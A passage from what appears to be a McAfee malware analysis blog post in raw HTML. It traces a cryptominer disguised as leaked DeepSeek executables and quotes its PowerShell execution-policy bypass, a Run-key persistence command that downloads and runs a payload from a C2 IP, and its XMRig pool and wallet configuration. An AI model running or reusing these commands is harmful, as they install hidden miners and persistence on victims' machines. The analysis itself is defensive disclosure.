data-ccp-props=\"{&quot;134245418&quot;:true,&quot;134245529&quot;:true}\">\u00a0<\/span><\/li>\n<\/ul>\n<ul>\n<li data-leveltext=\"\uf0b7\" data-font=\"Symbol\" data-listid=\"5\" data-list-defn-props=\"{&quot;335552541&quot;:1,&quot;335559685&quot;:720,&quot;335559991&quot;:360,&quot;469769226&quot;:&quot;Symbol&quot;,&quot;469769242&quot;:[8226],&quot;469777803&quot;:&quot;left&quot;,&quot;469777804&quot;:&quot;\uf0b7&quot;,&quot;469777815&quot;:&quot;hybridMultilevel&quot;}\" aria-setsize=\"-1\" data-aria-posinset=\"2\" data-aria-level=\"1\"><span data-contrast=\"auto\">DeepSeek-R1.Leaked.Version.exe<\/span><span data-ccp-props=\"{&quot;134245418&quot;:true,&quot;134245529&quot;:true}\">\u00a0<\/span><\/li>\n<\/ul>\n<ul>\n<li data-leveltext=\"\uf0b7\" data-font=\"Symbol\" data-listid=\"5\" data-list-defn-props=\"{&quot;335552541&quot;:1,&quot;335559685&quot;:720,&quot;335559991&quot;:360,&quot;469769226&quot;:&quot;Symbol&quot;,&quot;469769242&quot;:[8226],&quot;469777803&quot;:&quot;left&quot;,&quot;469777804&quot;:&quot;\uf0b7&quot;,&quot;469777815&quot;:&quot;hybridMultilevel&quot;}\" aria-setsize=\"-1\" data-aria-posinset=\"3\" data-aria-level=\"1\"><span data-contrast=\"auto\">DeepSeek-VL2.ISO.exe<\/span><span data-ccp-props=\"{&quot;134245418&quot;:true,&quot;134245529&quot;:true}\">\u00a0<\/span><\/li>\n<\/ul>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter size-full wp-image-210721\" src=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2025\/03\/Screenshot-2025-03-13-at-7.12.26-PM.png\" alt=\"\" width=\"1820\" height=\"926\" srcset=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2025\/03\/Screenshot-2025-03-13-at-7.12.26-PM.png 1820w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2025\/03\/Screenshot-2025-03-13-at-7.12.26-PM-300x153.png 300w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2025\/03\/Screenshot-2025-03-13-at-7.12.26-PM-1024x521.png 1024w, 
https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2025\/03\/Screenshot-2025-03-13-at-7.12.26-PM-768x391.png 768w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2025\/03\/Screenshot-2025-03-13-at-7.12.26-PM-1536x782.png 1536w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2025\/03\/Screenshot-2025-03-13-at-7.12.26-PM-205x104.png 205w\" sizes=\"auto, (max-width: 1820px) 100vw, 1820px\" \/><\/p>\n<p style=\"text-align: center;\"><em><strong><span class=\"NormalTextRun SCXW157194579 BCX0\">Figure <\/span><span class=\"NormalTextRun SCXW157194579 BCX0\">1<\/span><span class=\"NormalTextRun SCXW157194579 BCX0\">1<\/span><span class=\"NormalTextRun SCXW157194579 BCX0\">: <\/span><span class=\"NormalTextRun SpellingErrorV2Themed SCXW157194579 BCX0\">CryptoMiner<\/span> <span class=\"NormalTextRun SpellingErrorV2Themed SCXW157194579 BCX0\">KillChain<\/span><\/strong><\/em><\/p>\n<h3 aria-level=\"5\"><span data-contrast=\"none\">Initial Execution<\/span><span data-ccp-props=\"{&quot;134245418&quot;:true,&quot;134245529&quot;:true,&quot;335559738&quot;:80,&quot;335559739&quot;:40}\">\u00a0<\/span><\/h3>\n<p><span data-contrast=\"auto\">Once installed, this malware communicates with its <strong>*<\/strong><\/span><strong>C&amp;C<\/strong><span data-contrast=\"auto\"><strong> (<\/strong>Command and Control) to download and execute a <strong>*<\/strong><\/span><strong>PowerShell<\/strong><span data-contrast=\"auto\"> script. 
Figure 12 (a) and (b) show the malware connecting to its C&amp;C IP address to download chunks of a script file, which is then stored in the AppData\\Roaming folder as <\/span><i><span data-contrast=\"auto\">installer.ps1<\/span><\/i><span data-contrast=\"auto\">.\u00a0<\/span><span data-ccp-props=\"{&quot;134245418&quot;:true,&quot;134245529&quot;:true,&quot;335559685&quot;:720}\">\u00a0<\/span><\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter size-full wp-image-209839\" src=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2025\/03\/Screenshot-2025-03-04-at-3.20.21-PM.png\" alt=\"\" width=\"1496\" height=\"224\" srcset=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2025\/03\/Screenshot-2025-03-04-at-3.20.21-PM.png 1496w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2025\/03\/Screenshot-2025-03-04-at-3.20.21-PM-300x45.png 300w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2025\/03\/Screenshot-2025-03-04-at-3.20.21-PM-1024x153.png 1024w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2025\/03\/Screenshot-2025-03-04-at-3.20.21-PM-768x115.png 768w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2025\/03\/Screenshot-2025-03-04-at-3.20.21-PM-205x31.png 205w\" sizes=\"auto, (max-width: 1496px) 100vw, 1496px\" \/><\/p>\n<p style=\"text-align: center;\"><em><strong><span class=\"TextRun MacChromeBold SCXW225999717 BCX0\" lang=\"EN-US\" xml:lang=\"EN-US\" data-contrast=\"auto\"><span class=\"NormalTextRun SCXW225999717 BCX0\">Figure <\/span><span class=\"NormalTextRun SCXW225999717 BCX0\">1<\/span><span class=\"NormalTextRun SCXW225999717 BCX0\">2<\/span><span class=\"NormalTextRun SCXW225999717 BCX0\">(a)<\/span><span class=\"NormalTextRun SCXW225999717 BCX0\">: Sample connects to <\/span><span class=\"NormalTextRun SCXW225999717 BCX0\">C&amp;C <\/span><span class=\"NormalTextRun SCXW225999717 BCX0\">IP Address<\/span><\/span><span class=\"EOP SCXW225999717 BCX0\" 
data-ccp-props=\"{&quot;134245418&quot;:true,&quot;134245529&quot;:true,&quot;335551550&quot;:2,&quot;335551620&quot;:2}\">\u00a0<\/span><\/strong><\/em><\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter size-full wp-image-209854\" src=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2025\/03\/Screenshot-2025-03-04-at-3.21.00-PM.png\" alt=\"\" width=\"1892\" height=\"510\" srcset=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2025\/03\/Screenshot-2025-03-04-at-3.21.00-PM.png 1892w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2025\/03\/Screenshot-2025-03-04-at-3.21.00-PM-300x81.png 300w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2025\/03\/Screenshot-2025-03-04-at-3.21.00-PM-1024x276.png 1024w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2025\/03\/Screenshot-2025-03-04-at-3.21.00-PM-768x207.png 768w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2025\/03\/Screenshot-2025-03-04-at-3.21.00-PM-1536x414.png 1536w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2025\/03\/Screenshot-2025-03-04-at-3.21.00-PM-205x55.png 205w\" sizes=\"auto, (max-width: 1892px) 100vw, 1892px\" \/><\/p>\n<p style=\"text-align: center;\"><em><strong><span class=\"NormalTextRun SCXW196867112 BCX0\">Figure <\/span><span class=\"NormalTextRun SCXW196867112 BCX0\">1<\/span><span class=\"NormalTextRun SCXW196867112 BCX0\">2<\/span><span class=\"NormalTextRun SCXW196867112 BCX0\">(b)<\/span><span class=\"NormalTextRun SCXW196867112 BCX0\">: Installer.ps1 stored in Roaming folder<\/span><\/strong><\/em><\/p>\n<h3 aria-level=\"5\"><span data-contrast=\"none\">Injection\u00a0<\/span><span data-ccp-props=\"{&quot;134245418&quot;:true,&quot;134245529&quot;:true,&quot;335559738&quot;:80,&quot;335559739&quot;:40}\">\u00a0<\/span><\/h3>\n<p><span data-contrast=\"auto\">An attempt is made to bypass the PowerShell execution policy and launch the script:<\/span><span 
data-ccp-props=\"{&quot;134245418&quot;:true,&quot;134245529&quot;:true,&quot;335559685&quot;:720}\">\u00a0<\/span><\/p>\n<ul>\n<li data-leveltext=\"\uf0b7\" data-font=\"Symbol\" data-listid=\"4\" data-list-defn-props=\"{&quot;335552541&quot;:1,&quot;335559685&quot;:1080,&quot;335559991&quot;:360,&quot;469769226&quot;:&quot;Symbol&quot;,&quot;469769242&quot;:[8226],&quot;469777803&quot;:&quot;left&quot;,&quot;469777804&quot;:&quot;\uf0b7&quot;,&quot;469777815&quot;:&quot;hybridMultilevel&quot;}\" aria-setsize=\"-1\" data-aria-posinset=\"1\" data-aria-level=\"1\"><i><span data-contrast=\"auto\">\/c powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -File &#8220;C:\\Users\\admin\\AppData\\Roaming\\installer.ps1<\/span><\/i><span data-ccp-props=\"{&quot;134245418&quot;:true,&quot;134245529&quot;:true}\">\u00a0<\/span><\/li>\n<\/ul>\n<ul>\n<li data-leveltext=\"\uf0b7\" data-font=\"Symbol\" data-listid=\"4\" data-list-defn-props=\"{&quot;335552541&quot;:1,&quot;335559685&quot;:1080,&quot;335559991&quot;:360,&quot;469769226&quot;:&quot;Symbol&quot;,&quot;469769242&quot;:[8226],&quot;469777803&quot;:&quot;left&quot;,&quot;469777804&quot;:&quot;\uf0b7&quot;,&quot;469777815&quot;:&quot;hybridMultilevel&quot;}\" aria-setsize=\"-1\" data-aria-posinset=\"2\" data-aria-level=\"1\"><span data-contrast=\"auto\">The \u2018installer.ps1\u2019 contains malicious code which will be injected and executed using a technique called <strong>*<\/strong><\/span><strong>Process Injection<\/strong><span data-contrast=\"auto\">\u00a0 (Figure 14)<\/span><span data-ccp-props=\"{&quot;134245418&quot;:true,&quot;134245529&quot;:true}\">\u00a0<\/span><\/li>\n<\/ul>\n<ul>\n<li data-leveltext=\"\uf0b7\" data-font=\"Symbol\" data-listid=\"4\" 
data-list-defn-props=\"{&quot;335552541&quot;:1,&quot;335559685&quot;:1080,&quot;335559991&quot;:360,&quot;469769226&quot;:&quot;Symbol&quot;,&quot;469769242&quot;:[8226],&quot;469777803&quot;:&quot;left&quot;,&quot;469777804&quot;:&quot;\uf0b7&quot;,&quot;469777815&quot;:&quot;hybridMultilevel&quot;}\" aria-setsize=\"-1\" data-aria-posinset=\"3\" data-aria-level=\"1\"><span data-contrast=\"auto\">Figure 13 shows how the malware encodes this script to avoid detection<\/span><span data-ccp-props=\"{&quot;134245418&quot;:true,&quot;134245529&quot;:true}\">\u00a0<\/span><\/li>\n<\/ul>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter size-full wp-image-209869\" src=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2025\/03\/Screenshot-2025-03-04-at-3.21.30-PM.png\" alt=\"\" width=\"1000\" height=\"441\" srcset=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2025\/03\/Screenshot-2025-03-04-at-3.21.30-PM.png 1000w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2025\/03\/Screenshot-2025-03-04-at-3.21.30-PM-300x132.png 300w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2025\/03\/Screenshot-2025-03-04-at-3.21.30-PM-768x339.png 768w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2025\/03\/Screenshot-2025-03-04-at-3.21.30-PM-205x90.png 205w\" sizes=\"auto, (max-width: 1000px) 100vw, 1000px\" \/><\/p>\n<p style=\"text-align: center;\"><em><strong><span class=\"NormalTextRun SCXW85956038 BCX0\">Figure <\/span><span class=\"NormalTextRun SCXW85956038 BCX0\">1<\/span><span class=\"NormalTextRun SCXW85956038 BCX0\">3<\/span><span class=\"NormalTextRun SCXW85956038 BCX0\">: Base64 Encoded <\/span><span class=\"NormalTextRun SCXW85956038 BCX0\">Malicious Code<\/span><\/strong><\/em><\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter size-full wp-image-209899\" src=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2025\/03\/Screenshot-2025-03-04-at-3.22.58-PM.png\" alt=\"\" width=\"1520\" height=\"948\" 
srcset=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2025\/03\/Screenshot-2025-03-04-at-3.22.58-PM.png 1520w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2025\/03\/Screenshot-2025-03-04-at-3.22.58-PM-300x187.png 300w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2025\/03\/Screenshot-2025-03-04-at-3.22.58-PM-1024x639.png 1024w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2025\/03\/Screenshot-2025-03-04-at-3.22.58-PM-768x479.png 768w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2025\/03\/Screenshot-2025-03-04-at-3.22.58-PM-205x129.png 205w\" sizes=\"auto, (max-width: 1520px) 100vw, 1520px\" \/><\/p>\n<p style=\"text-align: center;\"><em><strong><span class=\"NormalTextRun SCXW20049359 BCX0\">Figure <\/span><span class=\"NormalTextRun SCXW20049359 BCX0\">1<\/span><span class=\"NormalTextRun SCXW20049359 BCX0\">4<\/span><span class=\"NormalTextRun SCXW20049359 BCX0\">: PowerShell code for Process Injection.<\/span><\/strong><\/em><\/p>\n<h3 aria-level=\"5\"><strong>*Persistence \u00a0<\/strong><\/h3>\n<p><span data-contrast=\"auto\">The malware attempts to maintain <\/span><span data-contrast=\"none\">persistence<\/span><span data-contrast=\"auto\"> on the victim\u2019s computer.\u00a0<\/span><span data-ccp-props=\"{&quot;134245418&quot;:true,&quot;134245529&quot;:true,&quot;335559685&quot;:720}\">\u00a0<\/span><\/p>\n<ul>\n<li data-leveltext=\"\uf0b7\" data-font=\"Symbol\" data-listid=\"8\" data-list-defn-props=\"{&quot;335552541&quot;:1,&quot;335559685&quot;:1080,&quot;335559991&quot;:360,&quot;469769226&quot;:&quot;Symbol&quot;,&quot;469769242&quot;:[8226],&quot;469777803&quot;:&quot;left&quot;,&quot;469777804&quot;:&quot;\uf0b7&quot;,&quot;469777815&quot;:&quot;hybridMultilevel&quot;}\" aria-setsize=\"-1\" data-aria-posinset=\"1\" data-aria-level=\"1\"><span data-contrast=\"auto\">It executes reg.exe with the following command line (Fig. 15):<\/span><span 
data-ccp-props=\"{&quot;134245418&quot;:true,&quot;134245529&quot;:true}\">\u00a0<\/span><\/li>\n<\/ul>\n<ul>\n<li data-leveltext=\"o\" data-font=\"Courier New\" data-listid=\"8\" data-list-defn-props=\"{&quot;335552541&quot;:1,&quot;335559685&quot;:1800,&quot;335559991&quot;:360,&quot;469769226&quot;:&quot;Courier New&quot;,&quot;469769242&quot;:[9675],&quot;469777803&quot;:&quot;left&quot;,&quot;469777804&quot;:&quot;o&quot;,&quot;469777815&quot;:&quot;hybridMultilevel&quot;}\" aria-setsize=\"-1\" data-aria-posinset=\"1\" data-aria-level=\"2\"><span data-contrast=\"auto\">reg add &#8220;HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run&#8221; \/v WindowsUpdate \/t REG_SZ \/d &#8220;powershell -ExecutionPolicy Bypass -NoProfile -Command Invoke-WebRequest -Uri 45[.]144[.]212[.]77:16000\/client -OutFile C:\\Users\\admin\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\runps.exe; Start-Process C:\\Users\\admin\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\runps.exe&#8221; \/f<\/span><span data-ccp-props=\"{}\">\u00a0<\/span><\/li>\n<\/ul>\n<p><span data-ccp-props=\"{&quot;134245418&quot;:true,&quot;134245529&quot;:true}\">\u00a0<\/span><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter size-full wp-image-209929\" src=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2025\/03\/Screenshot-2025-03-04-at-3.24.25-PM.png\" alt=\"\" width=\"1498\" height=\"248\" srcset=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2025\/03\/Screenshot-2025-03-04-at-3.24.25-PM.png 1498w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2025\/03\/Screenshot-2025-03-04-at-3.24.25-PM-300x50.png 300w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2025\/03\/Screenshot-2025-03-04-at-3.24.25-PM-1024x170.png 1024w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2025\/03\/Screenshot-2025-03-04-at-3.24.25-PM-768x127.png 768w, 
https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2025\/03\/Screenshot-2025-03-04-at-3.24.25-PM-205x34.png 205w\" sizes=\"auto, (max-width: 1498px) 100vw, 1498px\" \/><\/p>\n<p style=\"text-align: center;\"><em><strong><span class=\"NormalTextRun SCXW172331638 BCX0\">Figure <\/span><span class=\"NormalTextRun SCXW172331638 BCX0\">1<\/span><span class=\"NormalTextRun SCXW172331638 BCX0\">5<\/span><span class=\"NormalTextRun SCXW172331638 BCX0\">: Creating Run Key entry to <\/span><span class=\"NormalTextRun SCXW172331638 BCX0\">maintain<\/span><span class=\"NormalTextRun SCXW172331638 BCX0\"> persistence<\/span><\/strong><\/em><\/p>\n<ul>\n<li><span class=\"TextRun SCXW195300034 BCX0\" lang=\"EN-US\" xml:lang=\"EN-US\" data-contrast=\"auto\"><span class=\"NormalTextRun SCXW195300034 BCX0\">Th<\/span><span class=\"NormalTextRun SCXW195300034 BCX0\">is<\/span><span class=\"NormalTextRun SCXW195300034 BCX0\"> command retrieves a file named <\/span><\/span><span class=\"TextRun SCXW195300034 BCX0\" lang=\"EN-US\" xml:lang=\"EN-US\" data-contrast=\"auto\"><span class=\"NormalTextRun SCXW195300034 BCX0\">client.exe<\/span><\/span><span class=\"TextRun SCXW195300034 BCX0\" lang=\"EN-US\" xml:lang=\"EN-US\" data-contrast=\"auto\"><span class=\"NormalTextRun SCXW195300034 BCX0\"> from the C2 server, saves it in the <\/span><span class=\"NormalTextRun SCXW195300034 BCX0\">Programs\\<\/span><span class=\"NormalTextRun SCXW195300034 BCX0\">Startup<\/span><span class=\"NormalTextRun SCXW195300034 BCX0\"> as <\/span><\/span><span class=\"TextRun SCXW195300034 BCX0\" lang=\"EN-US\" xml:lang=\"EN-US\" data-contrast=\"auto\"><span class=\"NormalTextRun SCXW195300034 BCX0\">runps.exe<\/span><\/span><span class=\"TextRun SCXW195300034 BCX0\" lang=\"EN-US\" xml:lang=\"EN-US\" data-contrast=\"auto\"><span class=\"NormalTextRun SCXW195300034 BCX0\">, and executes it<\/span><span class=\"NormalTextRun SCXW195300034 BCX0\"> as its 
<strong>*<\/strong><strong>Payload<\/strong><\/span><span class=\"NormalTextRun SCXW195300034 BCX0\">. The file <\/span><\/span><span class=\"TextRun SCXW195300034 BCX0\" lang=\"EN-US\" xml:lang=\"EN-US\" data-contrast=\"auto\"><span class=\"NormalTextRun SCXW195300034 BCX0\">runps.exe<\/span><\/span><span class=\"TextRun SCXW195300034 BCX0\" lang=\"EN-US\" xml:lang=\"EN-US\" data-contrast=\"auto\"><span class=\"NormalTextRun SCXW195300034 BCX0\"> is <\/span><span class=\"NormalTextRun SCXW195300034 BCX0\">identified as<\/span> <strong>*<\/strong><\/span><strong><span class=\"TextRun Underlined SCXW195300034 BCX0\" lang=\"EN-US\" xml:lang=\"EN-US\" data-contrast=\"none\"><span class=\"NormalTextRun SCXW195300034 BCX0\" data-ccp-charstyle=\"Hyperlink\">XMRig<\/span><\/span><\/strong><span class=\"TextRun SCXW195300034 BCX0\" lang=\"EN-US\" xml:lang=\"EN-US\" data-contrast=\"auto\"><span class=\"NormalTextRun SCXW195300034 BCX0\"> mining software.<\/span><span class=\"NormalTextRun SCXW195300034 BCX0\">\u00a0<\/span><\/span><span class=\"EOP SCXW195300034 BCX0\" data-ccp-props=\"{&quot;134245418&quot;:true,&quot;134245529&quot;:true}\">\u00a0<\/span><\/li>\n<\/ul>\n<h3 aria-level=\"5\"><span data-contrast=\"none\">Payload<\/span><span data-ccp-props=\"{&quot;134245418&quot;:true,&quot;134245529&quot;:true,&quot;335559738&quot;:80,&quot;335559739&quot;:40}\">\u00a0<\/span><\/h3>\n<ul>\n<li data-leveltext=\"\uf0b7\" data-font=\"Symbol\" data-listid=\"6\" data-list-defn-props=\"{&quot;335552541&quot;:1,&quot;335559685&quot;:720,&quot;335559991&quot;:360,&quot;469769226&quot;:&quot;Symbol&quot;,&quot;469769242&quot;:[8226],&quot;469777803&quot;:&quot;left&quot;,&quot;469777804&quot;:&quot;\uf0b7&quot;,&quot;469777815&quot;:&quot;hybridMultilevel&quot;}\" aria-setsize=\"-1\" data-aria-posinset=\"1\" data-aria-level=\"1\"><span data-contrast=\"auto\">To initiate the mining process, it connects to the same C2 server and downloads additional parameters.\u00a0<\/span><span 
data-ccp-props=\"{&quot;134245418&quot;:true,&quot;134245529&quot;:true}\">\u00a0<\/span><\/li>\n<\/ul>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter size-full wp-image-209944\" src=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2025\/03\/Screenshot-2025-03-04-at-3.25.26-PM.png\" alt=\"\" width=\"1620\" height=\"246\" srcset=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2025\/03\/Screenshot-2025-03-04-at-3.25.26-PM.png 1620w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2025\/03\/Screenshot-2025-03-04-at-3.25.26-PM-300x46.png 300w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2025\/03\/Screenshot-2025-03-04-at-3.25.26-PM-1024x155.png 1024w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2025\/03\/Screenshot-2025-03-04-at-3.25.26-PM-768x117.png 768w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2025\/03\/Screenshot-2025-03-04-at-3.25.26-PM-1536x233.png 1536w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2025\/03\/Screenshot-2025-03-04-at-3.25.26-PM-205x31.png 205w\" sizes=\"auto, (max-width: 1620px) 100vw, 1620px\" \/><\/p>\n<p style=\"text-align: center;\"><em><strong><span class=\"TextRun MacChromeBold SCXW163729613 BCX0\" lang=\"EN-US\" xml:lang=\"EN-US\" data-contrast=\"auto\"><span class=\"NormalTextRun SCXW163729613 BCX0\">Figure <\/span><span class=\"NormalTextRun SCXW163729613 BCX0\">1<\/span><span class=\"NormalTextRun SCXW163729613 BCX0\">6<\/span><span class=\"NormalTextRun SCXW163729613 BCX0\">: HTTP response that <\/span><span class=\"NormalTextRun SCXW163729613 BCX0\">contains<\/span> <span class=\"NormalTextRun SCXW163729613 BCX0\">additional<\/span> <span class=\"NormalTextRun SCXW163729613 BCX0\">parameters<\/span><\/span><span class=\"EOP SCXW163729613 BCX0\" data-ccp-props=\"{&quot;134245418&quot;:true,&quot;134245529&quot;:true,&quot;335551550&quot;:2,&quot;335551620&quot;:2}\">\u00a0<\/span><\/strong><\/em><\/p>\n<p><b><span 
data-contrast=\"auto\">[{&quot;address&quot;:&quot;494k9WqKJKFGDoD9MfnAcjEDcrHMmMNJTUun8rYFRYyPHyoHMJf5sesH79UoM8VfoGYevyzthG86r5BTGYZxmhENTzKajL3&quot;,&quot;idle_threads&quot;:90,&quot;idle_time&quot;:1,&quot;password&quot;:&quot;x&quot;,&quot;pool&quot;:&quot;pool.hashvault.pro:443&quot;,&quot;task&quot;:&quot;FALLEN|NOTASK&quot;,&quot;threads&quot;:40}]<\/span><\/b><span data-ccp-props=\"{&quot;335559685&quot;:720,&quot;335559739&quot;:0}\">\u00a0<\/span><\/p>\n<ul>\n<li data-leveltext=\"\uf0b7\" data-font=\"Symbol\" data-listid=\"6\" data-list-defn-props=\"{&quot;335552541&quot;:1,&quot;335559685&quot;:720,&quot;335559991&quot;:360,&quot;469769226&quot;:&quot;Symbol&quot;,&quot;469769242&quot;:[8226],&quot;469777803&quot;:&quot;left&quot;,&quot;469777804&quot;:&quot;\uf0b7&quot;,&quot;469777815&quot;:&quot;hybridMultilevel&quot;}\" aria-setsize=\"-1\" data-aria-posinset=\"2\" data-aria-level=\"1\"><span data-contrast=\"auto\">These are the parameters used to identify the wallet address.<\/span><span data-ccp-props=\"{&quot;335559739&quot;:0}\">\u00a0<\/span><\/li>\n<\/ul>\n<ul>\n<li data-leveltext=\"\uf0b7\" data-font=\"Symbol\" data-listid=\"6\" data-list-defn-props=\"{&quot;335552541&quot;:1,&quot;335559685&quot;:720,&quot;335559991&quot;:360,&quot;469769226&quot;:&quot;Symbol&quot;,&quot;469769242&quot;:[8226],&quot;469777803&quot;:&quot;left&quot;,&quot;469777804&quot;:&quot;\uf0b7&quot;,&quot;469777815&quot;:&quot;hybridMultilevel&quot;}\" aria-setsize=\"-1\" data-aria-posinset=\"3\" data-aria-level=\"1\"><span data-contrast=\"auto\">The payload injects into Notepad.exe (a legitimate Windows process) and uses the downloaded parameters to start the mining process.<\/span><span data-ccp-props=\"{&quot;335559739&quot;:0}\">\u00a0<\/span><\/li>\n<\/ul>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter size-full wp-image-209959\" 
src=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2025\/03\/Screenshot-2025-03-04-at-3.26.22-PM.png\" alt=\"\" width=\"1524\" height=\"286\" srcset=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2025\/03\/Screenshot-2025-03-04-at-3.26.22-PM.png 1524w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2025\/03\/Screenshot-2025-03-04-at-3.26.22-PM-300x56.png 300w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2025\/03\/Screenshot-2025-03-04-at-3.26.22-PM-1024x192.png 1024w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2025\/03\/Screenshot-2025-03-04-at-3.26.22-PM-768x144.png 768w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2025\/03\/Screenshot-2025-03-04-at-3.26.22-PM-205x38.png 205w\" sizes=\"auto, (max-width: 1524px) 100vw, 1524px\" \/><\/p>\n<p style=\"text-align: center;\"><em><strong><span class=\"TextRun MacChromeBold SCXW116644677 BCX0\" lang=\"EN-US\" xml:lang=\"EN-US\" data-contrast=\"auto\"><span class=\"NormalTextRun SCXW116644677 BCX0\">Figure <\/span><span class=\"NormalTextRun SCXW116644677 BCX0\">1<\/span><span class=\"NormalTextRun SCXW116644677 BCX0\">7<\/span><span class=\"NormalTextRun SCXW116644677 BCX0\">: Notepad.exe being executed with <\/span><span class=\"NormalTextRun SCXW116644677 BCX0\">additional<\/span> <span class=\"NormalTextRun SCXW116644677 BCX0\">parameters<\/span><\/span><span class=\"EOP SCXW116644677 BCX0\" data-ccp-props=\"{&quot;335551550&quot;:2,&quot;335551620&quot;:2,&quot;335559739&quot;:0}\">\u00a0<\/span><\/strong><\/em><\/p>\n<ul>\n<li><span class=\"TextRun SCXW241724983 BCX0\" lang=\"EN-US\" xml:lang=\"EN-US\" data-contrast=\"auto\"><span class=\"NormalTextRun SCXW241724983 BCX0\">We can further understand malware\u2019s behavior by analyzing <\/span><span class=\"NormalTextRun SCXW241724983 BCX0\">the <\/span><span class=\"NormalTextRun SCXW241724983 BCX0\">downloaded<\/span><span class=\"NormalTextRun SCXW241724983 BCX0\"> information<\/span><span 
class=\"NormalTextRun SCXW241724983 BCX0\">.<\/span><\/span>\n<ul>\n<li>\n<ul>\n<li data-leveltext=\"o\" data-font=\"Courier New\" data-listid=\"1\" data-list-defn-props=\"{&quot;335552541&quot;:1,&quot;335559685&quot;:1440,&quot;335559991&quot;:360,&quot;469769226&quot;:&quot;Courier New&quot;,&quot;469769242&quot;:[9675],&quot;469777803&quot;:&quot;left&quot;,&quot;469777804&quot;:&quot;o&quot;,&quot;469777815&quot;:&quot;hybridMultilevel&quot;}\" aria-setsize=\"-1\" data-aria-posinset=\"1\" data-aria-level=\"1\"><b><span data-contrast=\"auto\">&#8211;donate-level 2<\/span><\/b><span data-contrast=\"auto\">: The Donation level is set at 2%. I.e., 2% of the total mining time will be donated to XMRig developers.\u00a0<\/span><span data-ccp-props=\"{&quot;335559739&quot;:0}\">\u00a0<\/span><\/li>\n<\/ul>\n<ul>\n<li data-leveltext=\"o\" data-font=\"Courier New\" data-listid=\"1\" data-list-defn-props=\"{&quot;335552541&quot;:1,&quot;335559685&quot;:1440,&quot;335559991&quot;:360,&quot;469769226&quot;:&quot;Courier New&quot;,&quot;469769242&quot;:[9675],&quot;469777803&quot;:&quot;left&quot;,&quot;469777804&quot;:&quot;o&quot;,&quot;469777815&quot;:&quot;hybridMultilevel&quot;}\" aria-setsize=\"-1\" data-aria-posinset=\"2\" data-aria-level=\"1\"><b><span data-contrast=\"auto\">-o pool.hashvault.pro:443<\/span><\/b><span data-contrast=\"auto\">: This specifies the mining pool to connect to; pool.hashvault.pro (in this case)<\/span><span data-ccp-props=\"{&quot;335559739&quot;:0}\">\u00a0<\/span><\/li>\n<\/ul>\n<ul>\n<li data-leveltext=\"o\" data-font=\"Courier New\" data-listid=\"1\" data-list-defn-props=\"{&quot;335552541&quot;:1,&quot;335559685&quot;:1440,&quot;335559991&quot;:360,&quot;469769226&quot;:&quot;Courier 